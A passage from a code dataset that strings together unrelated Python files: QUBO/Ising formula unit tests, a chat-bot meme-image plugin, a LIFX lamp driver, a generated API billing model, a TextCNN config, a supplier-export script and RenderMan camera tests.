        Eising = sq.py.formulas.dense_graph_batch_calculate_E_from_spin(h, J, c, qlist, self.dtype)
        self.assertTrue(np.allclose(Equbo, Eising, atol=self.epu))
# Tests for py.formulas
class TestPyDenseGraphFormulas(TestDenseGraphFormulasBase, unittest.TestCase) :
    """Runs the shared formula tests against the pure-Python backend (sq.py)."""
    def __init__(self, testFunc) :
        TestDenseGraphFormulasBase.__init__(self, sq.py, np.float64)
        unittest.TestCase.__init__(self, testFunc)
# Tests for native formula modules
class TestNativeDenseGraphFormulasBase(TestDenseGraphFormulasBase, unittest.TestCase) :
    def __init__(self, testFunc) :
        # NOTE(review): despite the "Native" class name this passes sq.py as
        # the package under test, so the compare_* methods below compare the
        # Python implementation with itself. Presumably this should be a
        # native backend (e.g. sq.cpu / sq.cuda) — confirm.
        TestDenseGraphFormulasBase.__init__(self, sq.py, np.float64)
        unittest.TestCase.__init__(self, testFunc)
    def test_compare_engery(self):
        # Per-bitset E from self.pkg must match the batched reference
        # (sq.py) over all 2**N bitsets. (sic: "engery" typo kept — renaming
        # would change the discovered test name.)
        N = 8
        W = self.new_W(N)
        xlist = common.create_bitset_sequence(range(0, 2 ** N), N)
        Ebatched = sq.py.formulas.dense_graph_batch_calculate_E(W, xlist, self.dtype)
        E = np.empty((2 ** N))
        for i in range(0, 2 ** N) :
            E[i] = self.pkg.formulas.dense_graph_calculate_E(W, xlist[i], self.dtype)
        self.assertTrue(np.allclose(Ebatched, E))
def test_compare_engery_batched(self):
N = 8
W = self.new_W(N)
xlist = common.create_bitset_sequence(range(0, 2 ** N), N)
Ebatched = sq.py.formulas.dense_graph_batch_calculate_E(W, xlist, self.dtype)
E = self.pkg.formulas.dense_graph_batch_calculate_E(W, xlist, self.dtype)
self.assertTrue(np.allclose(Ebatched, E))
def test_compare_hamiltonian(self):
N = 8
W = common.generate_random_symmetric_W((N), dtype=np.float64)
h0, J0, c0 = sq.py.formulas.dense_graph_calculate_hamiltonian(W, self.dtype)
h1, J1, c1 = self.pkg.formulas.dense_graph_calculate_hamiltonian(W, self.dtype)
# identity
self.assertTrue(np.allclose(0., - np.sum(h1) + np.sum(J1) + c1, atol=self.epu))
self.assertTrue(np.allclose(h0, h1))
self.assertTrue(np.allclose(J0, J1))
self.assertTrue(np.allclose(c0, c1))
def test_compare_hamiltonian_energy(self):
N = 8
W = common.generate_random_symmetric_W((N), dtype=np.float64)
h0, J0, c0 = sq.py.formulas.dense_graph_calculate_hamiltonian(W, self.dtype)
h1, J1, c1 = self.pkg.formulas.dense_graph_calculate_hamiltonian(W, self.dtype)
# identity
self.assertTrue(np.allclose(0., - np.sum(h1) + np.sum(J1) + c1, atol=self.epu))
xlist = common.create_bitset_sequence(range(0, 2 ** N), N)
Equbo = sq.py.formulas.dense_graph_batch_calculate_E(W, xlist, self.dtype)
Eising = np.empty((2 ** N))
for idx in range(0, 2 ** N) :
x = xlist[idx]
q = 2 * x - 1
Eising[idx] = self.pkg.formulas.dense_graph_calculate_E_from_spin(h1, J1, c1, q, self.dtype)
self.assertTrue(np.allclose(Equbo, Eising, atol=self.epu))
def test_compare_hamiltonian_energy_batched(self):
N = 8
W = common.generate_random_symmetric_W((N), dtype=np.float64)
h0, J0, c0 = sq.py.formulas.dense_graph_calculate_hamiltonian(W, self.dtype)
h1, J1, c1 = self.pkg.formulas.dense_graph_calculate_hamiltonian(W, self.dtype)
# identity
self.assertTrue(np.allclose(0., - np.sum(h1) + np.sum(J1) + c1, atol=self.epu))
xlist = common.create_bitset_sequence(range(0, 2 ** N), N)
Equbo = sq.py.formulas.dense_graph_batch_calculate_E(W, xlist, self.dtype)
Eising = np.empty((2 ** N))
qlist = 2 * xlist - 1
Eising = self.pkg.formulas.dense_graph_batch_calculate_E_from_spin(h1, J1, c1, qlist, self.dtype)
self.assertTrue(np.allclose(Equbo, Eising, atol=self.epu))
class TestCPUDenseGraphFormulasFP32(TestDenseGraphFormulasBase, unittest.TestCase) :
    # Runs the shared formula tests against the CPU backend in float32.
    def __init__(self, testFunc) :
        TestDenseGraphFormulasBase.__init__(self, sq.cpu, np.float32)
        unittest.TestCase.__init__(self, testFunc)
class TestCPUDenseGraphFormulasFP64(TestDenseGraphFormulasBase, unittest.TestCase) :
    # Runs the shared formula tests against the CPU backend in float64.
    def __init__(self, testFunc) :
        TestDenseGraphFormulasBase.__init__(self, sq.cpu, np.float64)
        unittest.TestCase.__init__(self, testFunc)
# CUDA-backed variants are only defined when a CUDA device is usable,
# so unittest discovery skips them cleanly on CPU-only machines.
if sq.is_cuda_available() :
    class TestCUDADenseGraphFormulasFP32(TestDenseGraphFormulasBase, unittest.TestCase) :
        # CUDA backend, float32 precision.
        def __init__(self, testFunc) :
            TestDenseGraphFormulasBase.__init__(self, sq.cuda, np.float32)
            unittest.TestCase.__init__(self, testFunc)
    class TestCUDADenseGraphFormulasFP64(TestDenseGraphFormulasBase, unittest.TestCase) :
        # CUDA backend, float64 precision.
        def __init__(self, testFunc) :
            TestDenseGraphFormulasBase.__init__(self, sq.cuda, np.float64)
            unittest.TestCase.__init__(self, testFunc)
if __name__ == '__main__':
    # Fixed seed keeps the random W matrices reproducible across runs.
    np.random.seed(0)
    unittest.main()
| StarcoderdataPython |
1658608 | from pandas import DataFrame, Series
def set_value_where(data, columns, value, where):
    """Assign ``value`` to column(s) ``columns`` for the rows of ``data``
    selected by the boolean mask ``where``.

    The frame is modified in place and returned to allow chaining.

    :type data: DataFrame
    :type columns: str
    :type where: Series
    :rtype: DataFrame
    """
    # DataFrame.set_value() was deprecated in pandas 0.21 and removed in
    # 1.0; .loc assignment is the supported equivalent.
    data.loc[data[where].index, columns] = value
    return data
| StarcoderdataPython |
3263970 | import os
import asyncio
from PIL import Image
from concurrent.futures import ThreadPoolExecutor
from hoshino import Service, priv
from hoshino.typing import HoshinoBot, CQEvent, MessageSegment, CommandSession
from hoshino.util import FreqLimiter, DailyNumberLimiter, pic2b64
from .src.generator import genImage
from .src.image import high_eq_path, draw_text, get_jl, concat_head_, concat_head_real_, make_hide_image, make_hide_image_color
from .src.utils import save_img, get_all_img_url
from hoshino.modules.image_generator.src.utils import get_image
# Per-user daily usage cap and per-use cooldown (seconds).
_max = 10
_time = 60
EXCEED_NOTICE = f'您今天已经使用{_max}次了,休息一下明天再来吧~'
_nlmt = DailyNumberLimiter(_max)
_flmt = FreqLimiter(_time)
# Help text shown by hoshino for this service (one line per command).
HELP_MSG = '''
[5000兆元|5000兆円|5kcy] (上半句) (下半句)
低情商 <文本> 高情商 <文本>
金龙盘旋 <文字1> <文字2> <底部文字>
金龙飞升 <文字1> <文字2> <底部文字>
金龙酷炫 <文字> <底部文字>
接头 <图片>
real接头 <图片>
@bot 隐藏图片
'''.strip()
sv = Service('生草图片生成器', help_=HELP_MSG)
@sv.on_prefix(('5000兆元', '5000兆円', '5kcy'))
async def gen_5000_pic(bot: HoshinoBot, ev: CQEvent):
    """Generate the "5000兆円欲しい!" style two-line image from the two
    words following the trigger prefix."""
    uid = ev.user_id
    if not _nlmt.check(uid):
        await bot.finish(ev, EXCEED_NOTICE, at_sender=True)
    if not _flmt.check(uid):
        await bot.finish(ev, f'您冲的太快了,{round(_flmt.left_time(uid))}秒后再来吧', at_sender=True)
    # Validate arguments outside the try block: bot.finish() raises to stop
    # the handler, and the old bare `except:` swallowed that exception and
    # sent a spurious "生成失败" message on top of the argument notice.
    args = ev.message.extract_plain_text().strip().split()
    if len(args) != 2:
        await bot.finish(ev, "5000兆元需要两个参数")
    upper = args[0]
    downer = args[1]
    try:
        img = genImage(word_a=upper, word_b=downer)
        img = str(MessageSegment.image(pic2b64(img)))
        await bot.send(ev, img, at_sender=True)
        # Apply both limiters the same way as the other handlers in this
        # module; superusers are exempt.
        if not priv.check_priv(ev, priv.SUPERUSER):
            _flmt.start_cd(uid)
            _nlmt.increase(uid)
    except OSError:
        await bot.send(ev, '生成失败……请检查字体文件设置是否正确')
    except Exception:
        await bot.send(ev, '生成失败……请检查命令格式是否正确')
@sv.on_rex('低情商(?P<left>.+)高情商(?P<right>.+)')
async def gen_high_eq(bot: HoshinoBot, ev: CQEvent):
    """Render the "low EQ / high EQ" two-panel meme from the matched text."""
    uid = ev['user_id']
    gid = ev['group_id']  # kept for parity with the other handlers; unused
    text_left = ev['match'].group('left').strip()
    text_right = ev['match'].group('right').strip()
    if not _nlmt.check(uid):
        await bot.finish(ev, EXCEED_NOTICE, at_sender=True)
    if not _flmt.check(uid):
        await bot.finish(ev, f'您冲的太快了,{round(_flmt.left_time(uid))}秒后再来吧', at_sender=True)
    if max(len(text_left), len(text_right)) > 15:
        await bot.finish(ev, '为了图片质量,请不要多于15个字符')
    # Draw the two captions onto the template: left panel at y=0, right at y=400.
    canvas = Image.open(high_eq_path)
    for caption, offset in ((text_left, 0), (text_right, 400)):
        draw_text(canvas, caption, offset)
    reply = str(MessageSegment.image(pic2b64(canvas)))
    # Superusers bypass the cooldown / daily-count bookkeeping.
    if not priv.check_priv(ev, priv.SUPERUSER):
        _flmt.start_cd(uid)
        _nlmt.increase(uid)
    await bot.send(ev, reply, at_sender=True)
@sv.on_prefix('金龙')
async def gen_jl(bot: HoshinoBot, ev: CQEvent):
    """Generate a "golden dragon" meme image via get_jl().

    Sub-commands: 盘旋/飞升 take three texts, 酷炫 takes two.
    """
    uid = ev['user_id']
    args = ev.message.extract_plain_text().strip().split()
    if not args:
        # Bare "金龙" with no sub-command: previously raised IndexError.
        return
    if not _nlmt.check(uid):
        await bot.finish(ev, EXCEED_NOTICE, at_sender=True)
    if not _flmt.check(uid):
        await bot.finish(ev, f'您冲的太快了,{round(_flmt.left_time(uid))}秒后再来吧', at_sender=True)
    mode = args[0]
    if mode in ('盘旋', '飞升'):
        # Both modes share identical argument handling.
        if len(args) != 4:
            await bot.finish(ev, f"金龙{mode}需要三个参数")
        url = await get_jl(mode, args[1], args[2], args[3])
    elif mode == '酷炫':
        if len(args) != 3:
            await bot.finish(ev, f"金龙{mode}需要两个参数")
        url = await get_jl(mode, args[1], None, args[2])
    else:
        return
    try:
        img = str(MessageSegment.image(url))
        if not priv.check_priv(ev, priv.SUPERUSER):
            _flmt.start_cd(uid)
            _nlmt.increase(uid)
        await bot.send(ev, img, at_sender=True)
    except Exception:
        # Bug fix: the failure notice was missing `await`, so the coroutine
        # was never executed and the user got no feedback.
        await bot.send(ev, '无法生成图片')
@sv.on_keyword(('接头霸王', '接头'))
async def concat_head(bot: HoshinoBot, ev: CQEvent):
    """Paste the "接头霸王" head onto a face detected in the supplied image.

    The keywords "三次元"/"real" switch to the real-photo variant.
    """
    uid = ev['user_id']
    msg = ev.message.extract_plain_text().strip()
    if not _nlmt.check(uid):
        await bot.finish(ev, EXCEED_NOTICE, at_sender=True)
    if not _flmt.check(uid):
        await bot.finish(ev, f'您冲的太快了,{round(_flmt.left_time(uid))}秒后再来吧', at_sender=True)
    if (img := await get_image(bot, ev)) is not None:
        if '三次元' in msg or 'real' in msg:
            catimg = await concat_head_real_(img)
        else:
            catimg = await concat_head_(img)
        if catimg is not None:
            catimg = str(MessageSegment.image(pic2b64(catimg)))
            await bot.send(ev, catimg, at_sender=True)
        else:
            # Bug fix: MessageSegment.image() needs a file path/URL; the old
            # code opened the PNG with PIL and interpolated the Image object
            # into the CQ code, producing a broken segment.
            fail_pic_path = os.path.join(os.path.dirname(__file__), 'images/head/接头失败.png')
            await bot.send(ev, '三次元图片试试三次元接头?' + MessageSegment.image(f'file://{fail_pic_path}'), at_sender=True)
    else:
        await bot.send(ev, '未检测到图片信息', at_sender=True)
# Per-user interactive state for the hide_image session:
#   img:        uid -> list of saved image paths (two are needed to compose)
#   send_times: uid -> consecutive prompts answered without an image
#   color_flag: uid -> whether to produce the colour "mirage tank" variant
img = {}
send_times = {}
color_flag = {}
@sv.on_command('hide_image', only_to_me=True, aliases=['隐藏图片'])
async def hide_image(session: CommandSession):
    """Interactive session: collect two images from the user, then merge
    them into a "hidden" (mirage-tank style) image.

    The session re-enters this handler on every user reply via
    ``session.pause()``; module-level dicts keep per-user progress.
    """
    global img
    global send_times
    # NOTE(review): color_flag is mutated below via item assignment, which
    # does not need a `global` statement — confirm intent.
    # aget() suspends the session until the user replies to the prompt.
    await session.aget('', prompt='发送要上传的图片,暂不支持gif')
    event = session.ctx
    uid = event['user_id']
    msg = event.message.extract_plain_text().strip()
    # Lazily initialise the per-user session state.
    if uid not in img:
        img[uid] = []
    if uid not in send_times:
        send_times[uid] = 0
    if uid not in color_flag:
        color_flag[uid] = False
    # The character "彩" anywhere in the reply switches to colour output.
    if '彩' in msg:
        color_flag[uid] = True
        await session.send('切换为彩图模式')
    image = await save_img(get_all_img_url(event))
    if image:
        img[uid].extend(image)
    else:
        # No image in the reply: count the miss and abort after 3 strikes.
        send_times[uid] += 1
        if send_times[uid] >= 3:
            await session.finish('过多次未发送图片,已自动停止')
            img[uid] = []
            send_times[uid] = 0
    if len(img[uid]) == 0:
        session.pause('请上传第一张图片')
    elif len(img[uid]) == 1:
        session.pause('请上传第二张图片')
    elif len(img[uid]) >= 2:
        await session.send('正在合成图片,请稍后')
        # Compositing is CPU-bound; run it in a thread pool so the event
        # loop stays responsive.
        loop = asyncio.get_event_loop()
        executor = ThreadPoolExecutor()
        if color_flag[uid]:
            res_img = await loop.run_in_executor(executor, make_hide_image_color, img[uid][0], img[uid][1])
        else:
            res_img = await loop.run_in_executor(executor, make_hide_image, img[uid][0], img[uid][1])
        msg = str(MessageSegment.image(pic2b64(res_img)))
        # Reset the per-user state before sending the final result.
        img[uid] = []
        send_times[uid] = 0
        color_flag[uid] = False
        await session.finish(msg)
| StarcoderdataPython |
3261317 | <filename>benchmarks/digis/lamp/driver/lifx.py
from digi import logger
from lifxlan import LifxLAN
def put(dev, power, color):
    """Apply ``power`` and ``color`` to the LIFX device handle ``dev``."""
    # TBD: in a single call
    dev.set_power(power)
    dev.set_color(color)
def get(dev, retry=3):
    """Read the power/color status of ``dev``, retrying up to ``retry``
    times on transient errors; returns None when every attempt fails."""
    attempts_left = retry
    while attempts_left > 0:
        attempts_left -= 1
        try:
            status = {
                "power": dev.get_power(),
                "color": dev.get_color(),
            }
        except Exception as e:
            logger.info(f"lifx: unable to get status due to {e}")
            continue
        return status
    return None
def discover(_id):
    """Find the LIFX light whose MAC address equals ``_id``.

    Returns the lifxlan device handle, or None when discovery fails or no
    light with that MAC is on the LAN (KeyError is caught below).
    """
    try:
        devices = LifxLAN().get_lights()
        device_by_mac = {d.get_mac_addr(): d for d in devices}
        logger.info(f"lifx: found {len(devices)} light(s): "
                    f"{device_by_mac}\n")
        return device_by_mac[_id]
    except Exception as e:
        logger.info(f"lifx: unable to find device due to {e}")
        return None
if __name__ == '__main__':
    # Smoke test: _id=None just logs what lights are on the LAN and returns None.
    discover(_id=None)
| StarcoderdataPython |
4814561 | # coding: utf-8
"""
NamSor API v2
NamSor API v2 : enpoints to process personal names (gender, cultural origin or ethnicity) in all alphabets or languages. Use GET methods for small tests, but prefer POST methods for higher throughput (batch processing of up to 100 names at a time). Need something you can't find here? We have many more features coming soon. Let us know, we'll do our best to add it! # noqa: E501
OpenAPI spec version: 2.0.10
Contact: <EMAIL>
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class APIBillingPeriodUsageOut(object):
    """Billing-period usage model (auto generated by OpenAPI Generator).

    Ref: https://openapi-generator.tech — prefer regenerating over hand edits.

    Attributes:
        openapi_types (dict): attribute name -> attribute type.
        attribute_map (dict): attribute name -> JSON key in the definition.
    """

    openapi_types = {
        'api_key': 'str',
        'subscription_started': 'int',
        'period_started': 'int',
        'period_ended': 'int',
        'stripe_current_period_end': 'int',
        'stripe_current_period_start': 'int',
        'billing_status': 'str',
        'usage': 'int',
        'soft_limit': 'int',
        'hard_limit': 'int'
    }

    attribute_map = {
        'api_key': 'apiKey',
        'subscription_started': 'subscriptionStarted',
        'period_started': 'periodStarted',
        'period_ended': 'periodEnded',
        'stripe_current_period_end': 'stripeCurrentPeriodEnd',
        'stripe_current_period_start': 'stripeCurrentPeriodStart',
        'billing_status': 'billingStatus',
        'usage': 'usage',
        'soft_limit': 'softLimit',
        'hard_limit': 'hardLimit'
    }

    def _prop(name, type_name):  # class-construction helper, deleted below
        """Build a plain property backed by the ``_<name>`` attribute."""
        private = '_' + name
        def fget(self):
            return getattr(self, private)
        def fset(self, value):
            setattr(self, private, value)
        return property(fget, fset,
                        doc=f"{type_name}: the {name} of this APIBillingPeriodUsageOut.")

    api_key = _prop('api_key', 'str')
    subscription_started = _prop('subscription_started', 'int')
    period_started = _prop('period_started', 'int')
    period_ended = _prop('period_ended', 'int')
    stripe_current_period_end = _prop('stripe_current_period_end', 'int')
    stripe_current_period_start = _prop('stripe_current_period_start', 'int')
    billing_status = _prop('billing_status', 'str')
    usage = _prop('usage', 'int')
    soft_limit = _prop('soft_limit', 'int')
    hard_limit = _prop('hard_limit', 'int')

    del _prop

    def __init__(self, api_key=None, subscription_started=None, period_started=None,
                 period_ended=None, stripe_current_period_end=None,
                 stripe_current_period_start=None, billing_status=None, usage=None,
                 soft_limit=None, hard_limit=None):  # noqa: E501
        """APIBillingPeriodUsageOut - a model defined in OpenAPI"""  # noqa: E501
        supplied = dict(locals())
        supplied.pop('self')
        # Every backing field starts out as None ...
        for name in self.openapi_types:
            setattr(self, '_' + name, None)
        self.discriminator = None
        # ... and only explicitly supplied values are assigned (through the
        # property setters, matching the generated-code behaviour).
        for name, value in supplied.items():
            if value is not None:
                setattr(self, name, value)

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        for attr in self.openapi_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = [item.to_dict() if hasattr(item, "to_dict") else item
                                for item in value]
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = {k: (v.to_dict() if hasattr(v, "to_dict") else v)
                                for k, v in value.items()}
            else:
                result[attr] = value
        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, APIBillingPeriodUsageOut):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| StarcoderdataPython |
3385867 | <filename>TextCNN/config.py
import torch
class Config(object):
    """Base configuration class for the TextCNN model.

    All hyper-parameters live as class attributes; ``__init__`` only
    resolves the compute device.
    """
    # Training / evaluation data directories.
    train_dir = "data/train"
    eval_dir = "data/eval"
    # Directory the trained model is saved to.
    save_path = 'model/'
    # Whether to use the GPU (downgraded to CPU when CUDA is unavailable).
    cuda = True
    # Number of training epochs.
    epochs = 2
    batch_size = 64
    # Optimiser settings: learning rate, momentum and weight decay.
    learning_rate = 0.001
    learning_momentum = 0.9
    weight_decay = 0.0001
    dropout = 0.5
    # Dimensionality of the generated word embeddings.
    embed_dim = 128
    # Number of convolution kernels and their (comma-separated) sizes.
    kernel_num = 100
    kernel_sizes = "3,4,5"
    # Save the model every this many epochs.
    save_interval = 2

    def __init__(self):
        # Keep cuda=True only when a CUDA device is actually present.
        if self.cuda:
            self.cuda = torch.cuda.is_available()
        self.device = torch.device("cuda:0" if self.cuda else "cpu")

    def dump(self):
        """Print every non-callable, non-dunder configuration value."""
        print("模型配置如下:")
        for name in dir(self):
            if not name.startswith("__") and not callable(getattr(self, name)):
                print("\t{:30} = {}".format(name, getattr(self, name)))
        print()
| StarcoderdataPython |
122827 | <filename>scripts/framework-applications/export-framework-applicant-details.py
#!/usr/bin/env python
"""Export supplier "about you" information for suppliers who applied to a framework.
This report includes registered company information and contact details.
Usage:
scripts/framework-applications/export-framework-applicant-details.py <stage> <framework_slug> <output_dir>
Options:
--verbose Show debug log messages
-h, --help Show this screen
Example:
scripts/framework-applications/export-framework-applicant-details.py dev g-cloud-12 SCRIPT_OUTPUTS
"""
import datetime
import errno
from multiprocessing.pool import ThreadPool
import os
import sys
sys.path.insert(0, '.')
from docopt import docopt
from dmscripts.helpers.auth_helpers import get_auth_token
from dmscripts.helpers.logging_helpers import configure_logger, get_logger
from dmscripts.helpers.logging_helpers import INFO as loglevel_INFO, DEBUG as loglevel_DEBUG
from dmscripts.export_framework_applicant_details import export_supplier_details
from dmapiclient import DataAPIClient
from dmutils.env_helpers import get_api_endpoint_from_stage
if __name__ == '__main__':
    arguments = docopt(__doc__)

    STAGE = arguments['<stage>']
    FRAMEWORK = arguments['<framework_slug>']
    OUTPUT_DIR = arguments['<output_dir>']

    configure_logger({"script": loglevel_DEBUG if arguments["--verbose"] else loglevel_INFO})
    logger = get_logger()

    client = DataAPIClient(get_api_endpoint_from_stage(STAGE), get_auth_token('api', STAGE))

    # Timestamped output filename, e.g.
    # g-cloud-12-supplier-about-you-data-2020-01-01_12.00-dev.csv
    now = datetime.datetime.now()
    filename = FRAMEWORK + "-supplier-about-you-data-" + now.strftime("%Y-%m-%d_%H.%M-") + STAGE + ".csv"
    filepath = OUTPUT_DIR + os.sep + filename

    # Create output directory if it doesn't already exist
    if not os.path.exists(os.path.dirname(filepath)):
        try:
            os.makedirs(os.path.dirname(filepath))
        except OSError as exc:  # Guard against race condition
            if exc.errno != errno.EEXIST:
                raise
    framework_lot_slugs = tuple([lot['slug'] for lot in client.get_framework(FRAMEWORK)['frameworks']['lots']])
    # Three worker threads keep API calls pipelined without hammering the API.
    pool = ThreadPool(3)
    export_supplier_details(
        client, FRAMEWORK, filepath, framework_lot_slugs=framework_lot_slugs, map_impl=pool.imap, logger=logger
    )
| StarcoderdataPython |
4826822 | ##########################################################################
#
# Copyright (c) 2008, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import IECore
import IECoreRI
import os.path
import os
class CameraTest( IECoreRI.TestCase ) :
	"""Exercises camera output for the IECoreRI renderer (Python 2 codebase).

	RIB-writing tests assert on the generated RIB text; rendering tests
	render a small plane and probe the output image with a
	PrimitiveEvaluator.
	"""

	def testParameters( self ) :
		# Emit a camera with every supported parameter and check each one
		# appears in the RIB as the expected Ri call.
		r = IECoreRI.Renderer( "test/IECoreRI/output/testCamera.rib" )
		r.camera( "main", {
			"resolution" : IECore.V2iData( IECore.V2i( 1024, 200 ) ),
			"screenWindow" : IECore.Box2fData( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) ),
			"cropWindow" : IECore.Box2fData( IECore.Box2f( IECore.V2f( 0.1, 0.1 ), IECore.V2f( 0.9, 0.9 ) ) ),
			"clippingPlanes" : IECore.V2fData( IECore.V2f( 1, 1000 ) ),
			"projection" : IECore.StringData( "perspective" ),
			"projection:fov" : IECore.FloatData( 45 ),
			"shutter" : IECore.V2fData( IECore.V2f( 0, 0.1 ) ),
		} )
		r.worldBegin()
		r.worldEnd()
		# Collapse whitespace so the assertions are layout-independent.
		l = "".join( file( "test/IECoreRI/output/testCamera.rib" ).readlines() )
		l = " ".join( l.split() )
		self.assert_( "Format 1024 200 1 " in l )
		self.assert_( "ScreenWindow -1 1 -1 1" in l )
		self.assert_( "CropWindow 0.1 0.9 0.1 0.9" in l )
		# Some RIB writers print 1000 as 1e3.
		self.assert_( ("Clipping 1 1000" in l) or ("Clipping 1 1e3" in l) )
		self.assert_( "Projection \"perspective\" \"float fov\" [ 45 ]" in l )
		self.assert_( "Shutter 0 0.1" in l )

	def testPositioning( self ) :
		# render a plane at z = 0 with the default camera
		r = IECoreRI.Renderer( "" )
		r.display( "test/IECoreRI/output/testCamera.tif", "tiff", "rgba", {} )
		r.worldBegin()
		IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -0.1 ), IECore.V2f( 0.1 ) ) ).render( r )
		r.worldEnd()
		# check that nothing appears in the output image
		i = IECore.Reader.create( "test/IECoreRI/output/testCamera.tif" ).read()
		e = IECore.PrimitiveEvaluator.create( i )
		result = e.createResult()
		a = e.A()
		e.pointAtUV( IECore.V2f( 0.5, 0.5 ), result )
		self.assertEqual( result.floatPrimVar( a ), 0 )
		del r
		# render a plane at z = 0 with the camera moved back a touch to see it
		r = IECoreRI.Renderer( "" )
		r.display( "test/IECoreRI/output/testCamera.tif", "tiff", "rgba", {} )
		r.transformBegin()
		r.concatTransform( IECore.M44f.createTranslated( IECore.V3f( 0, 0, 1 ) ) )
		r.camera( "main", {} )
		r.transformEnd()
		r.worldBegin()
		IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -0.1 ), IECore.V2f( 0.1 ) ) ).render( r )
		r.worldEnd()
		# check that something appears in the output image
		i = IECore.Reader.create( "test/IECoreRI/output/testCamera.tif" ).read()
		e = IECore.PrimitiveEvaluator.create( i )
		result = e.createResult()
		a = e.A()
		e.pointAtUV( IECore.V2f( 0.5, 0.5 ), result )
		self.assertEqual( result.floatPrimVar( a ), 1 )

	def testXYOrientation( self ) :
		# render a red square at x==1, and a green one at y==1
		r = IECoreRI.Renderer( "" )
		r.display( "test/IECoreRI/output/testCamera.tif", "tiff", "rgba", {} )
		r.transformBegin()
		r.concatTransform( IECore.M44f.createTranslated( IECore.V3f( 0, 0, 1 ) ) )
		r.camera( "main", { "resolution" : IECore.V2iData( IECore.V2i( 512 ) ) } )
		r.transformEnd()
		r.worldBegin()
		r.setAttribute( "color", IECore.Color3fData( IECore.Color3f( 1, 0, 0 ) ) )
		IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( 0.75, -0.25 ), IECore.V2f( 1.25, 0.25 ) ) ).render( r )
		r.setAttribute( "color", IECore.Color3fData( IECore.Color3f( 0, 1, 0 ) ) )
		IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -0.25, 0.75 ), IECore.V2f( 0.25, 1.25 ) ) ).render( r )
		r.worldEnd()
		# check we get the colors we'd expect where we expect them
		i = IECore.Reader.create( "test/IECoreRI/output/testCamera.tif" ).read()
		e = IECore.PrimitiveEvaluator.create( i )
		result = e.createResult()
		a = e.A()
		r = e.R()
		g = e.G()
		b = e.B()
		# UV (1, 0.5) is the middle of the right edge -> red square at x==1.
		e.pointAtUV( IECore.V2f( 1, 0.5 ), result )
		self.assertEqual( result.floatPrimVar( a ), 1 )
		self.assertEqual( result.floatPrimVar( r ), 1 )
		self.assertEqual( result.floatPrimVar( g ), 0 )
		self.assertEqual( result.floatPrimVar( b ), 0 )
		# UV (0.5, 0) is the middle of the top edge -> green square at y==1.
		e.pointAtUV( IECore.V2f( 0.5, 0 ), result )
		self.assertEqual( result.floatPrimVar( a ), 1 )
		self.assertEqual( result.floatPrimVar( r ), 0 )
		self.assertEqual( result.floatPrimVar( g ), 1 )
		self.assertEqual( result.floatPrimVar( b ), 0 )

	def testMultipleCameraRIB( self ) :
		# Two named cameras with different fovs must both be emitted,
		# each with its own Projection line.
		r = IECoreRI.Renderer( "test/IECoreRI/output/testCamera.rib" )
		with IECore.TransformBlock( r ) :
			r.setTransform( IECore.M44f.createTranslated( IECore.V3f( 1, 2, 3 ) ) )
			r.camera( "first", {
				"projection" : IECore.StringData( "perspective" ),
				"projection:fov" : IECore.FloatData( 45 ),
			} )
		with IECore.TransformBlock( r ) :
			r.setTransform( IECore.M44f.createTranslated( IECore.V3f( 3, 4, 5 ) ) )
			r.camera( "second", {
				"projection" : IECore.StringData( "perspective" ),
				"projection:fov" : IECore.FloatData( 50 ),
			} )
		with IECore.WorldBlock( r ) :
			pass
		l = "".join( file( "test/IECoreRI/output/testCamera.rib" ).readlines() )
		l = " ".join( l.split() )
		self.assertTrue( "Projection \"perspective\" \"float fov\" [ 45 ]" in l )
		self.assertTrue( "Camera \"first\"" in l )
		self.assertTrue( "Projection \"perspective\" \"float fov\" [ 50 ]" in l )
		self.assertTrue( "Camera \"second\"" in l )
		self.assertEqual( l.count( "Camera" ), 2 )

	def testMultipleCameraRender( self ) :
		# The last declared camera should be the active one for rendering.
		r = IECoreRI.Renderer( "" )
		r.display( "test/IECoreRI/output/testCamera.tif", "tiff", "rgba", {} )
		with IECore.TransformBlock( r ) :
			r.camera( "iCantSeeAnything", {} )
		with IECore.TransformBlock( r ) :
			r.concatTransform( IECore.M44f.createTranslated( IECore.V3f( 0, 0, 1 ) ) )
